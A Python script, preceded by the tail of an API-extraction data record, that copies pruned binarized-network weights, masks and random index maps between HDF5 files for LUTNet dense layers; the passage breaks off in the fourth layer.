((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sequencingtype"""'}), "(model='id_generate.sequencingtype')\n", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['"""Staff"""'], {'model': '"""auth.user"""'}), "('Staff', model='auth.user')\n", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""auth.group"""'}), "(model='auth.group')\n", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""admin.logentry"""'}), "(model='admin.logentry')\n", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2634, 2845), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request SOP"""'], {'target_blank': '(True)', 'url': 'f"""{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx"""'}), "('View JAX ID Request SOP', target_blank=True, url=\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\n )\n", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request Template Sheet"""'], {'url': 'f"""{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx"""'}), "('View JAX ID Request Template Sheet', url=\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\n )\n", (2926, 3142), False, 'from suit.menu import ParentItem, ChildItem\n')] |
import h5py
import numpy as np
np.set_printoptions(threshold=np.nan)
from shutil import copyfile
copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained.h5 using datastructure from dummy.h5
bl = h5py.File("baseline_pruned.h5", 'r')
#dummy = h5py.File("dummy.h5", 'r')
pretrained = h5py.File("pretrained_bin.h5", 'r+')
# dense layer 1
bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"]
zero_fill = np.zeros(np.shape(np.array(bl_w1)))
pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"]
pret_w1[...] = np.array(bl_w1)
p_gamma[...] = np.array(bl_gamma)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 2
bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])
for i in range(weight_shape[0]):
rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 3
bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])
for i in range(weight_shape[0]):
rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 4
bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])
for i in range(weight_shape[0]):
rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
